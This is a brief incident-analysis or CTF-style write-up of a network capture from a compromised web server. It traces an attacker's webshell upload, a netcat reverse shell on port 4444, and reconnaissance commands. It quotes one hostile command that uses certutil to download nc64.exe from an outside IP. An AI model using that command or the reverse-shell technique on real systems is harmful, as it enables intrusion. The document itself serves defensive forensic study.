One of our web servers triggered an AV alert, but none of the sysadmins say they were logged onto it. We’ve taken a network capture before shutting the server down to make a clone of the disk. Can you take a look at the PCAP and see if anything is up?
Filtering for HTTP traffic to make it clear.
First GET HTTP Requests and Responses from webserver 22.214.171.124
An attacker uploaded a webshell first (authKey=admin).
An attacker executed a command line and downloaded netcat via certutil.
certutil -urlcache -split -f http://126.96.36.199/nc64.exe
Now we can see netcat running on the webserver connecting back to an attacker machine over port 4444
An attacker executed whoami, ipconfig commands on the webserver.